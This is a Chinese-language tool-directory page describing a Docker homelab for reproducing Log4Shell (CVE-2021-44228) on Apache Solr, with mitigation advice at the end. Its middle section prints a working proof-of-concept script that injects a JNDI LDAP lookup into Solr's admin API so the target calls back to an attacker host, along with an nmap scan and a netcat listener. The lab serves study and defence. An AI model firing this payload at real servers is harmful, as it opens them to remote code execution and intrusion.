Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
homelab-CVE-2021-44228 — Log4j 漏洞家庭实验室 | Kitploit
工具/GitHubGitHub/ricardo354/homelab-cve-2021-44228
容器安全漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubricardo354/homelab-cve-2021-44228

homelab-CVE-2021-44228

Log4j 漏洞家庭实验室

查看仓库
41个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Homelab: Log4Shell (CVE-2021-44228) 在 Apache Solr 上

用于在 Docker 中复现和研究 Apache Solr 上 Log4Shell 漏洞的受控环境。

环境

  • 靶机 (solr-lab):Apache Solr v8.11.0 (vulhub/solr:8.11.0),运行着一个存在漏洞的 Log4j 版本。
  • 攻击机 (kali-lab):基础 Kali Linux 容器,预装了 nmap、curl 和 netcat。

如何启动实验室

1. 初始化容器

在您的终端中,将环境在后台启动:

root@kitploit:~
docker compose up -d --build

2. 进入 Kali(攻击机容器)

root@kitploit:~
docker compose exec -it kali-lab /bin/bash

3. 映射内部网络

在 Kali 容器内部,发现自己的子网并定位 Apache Solr 的 IP:

root@kitploit:~
# 1. 查看您的 IP 和网络掩码
hostname -I

# 2. 扫描内部网络以找到靶机 IP(Solr 端口:8983)
# (根据上一步获取的 IP 替换下面的子网)
nmap -p 8983 172.20.0.0/24


运行 PoC(概念验证)

poc.sh 脚本将 JNDI 查找 payload 注入到 Solr 管理 API 的参数中。

脚本 (poc.sh)

root@kitploit:~
#!/usr/bin/env bash

if [ "$#" -lt 2 ]; then
    echo "Uso: $0 <lhost> <rhost> [lport]"
    echo "Exemplo: $0 172.20.0.3 172.20.0.2 1389"
    exit 1
fi

KALI="$1"
TARGET="$2"
PORT_KALI="${3:-1389}"

echo "[*] Alvo: $TARGET"
echo "[*] Atacante (LDAP): $KALI na porta $PORT_KALI"
echo "[*] Disparando exploit..."

curl -g -v "http://${TARGET}:8983/solr/admin/cores?foo=\${jndi:ldap://${KALI}:${PORT_KALI}/x}"

执行

仍在 Kali 内部,赋予脚本执行权限并传入正确的 IP 运行:

root@kitploit:~
chmod +x poc.sh
./poc.sh <KALI_IP> <SOLR_IP> 1389

这里发生了什么? Solr 将处理该请求,并尝试打开一个返回 Kali IP 指定端口的 LDAP 连接。您可以在运行脚本之前在 Kali 上快速启动一个监听器来监视这个连接尝试(例如:nc -lnvp 1389)。


缓解措施

要修复 Log4j 2 中的漏洞:

  • 更新:将库迁移到安全版本(高于 2.15.0 或 2.17.1)。
  • JVM Format Msg:对于 2.10 到 2.14.1 之间的版本,通过在 Java 启动时添加标志 -Dlog4j2.formatMsgNoLookups=true 来禁用查找功能。
  • 删除类:如果无法更新,手动从 jar 中删除有问题的类:
root@kitploit:~
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

下载工具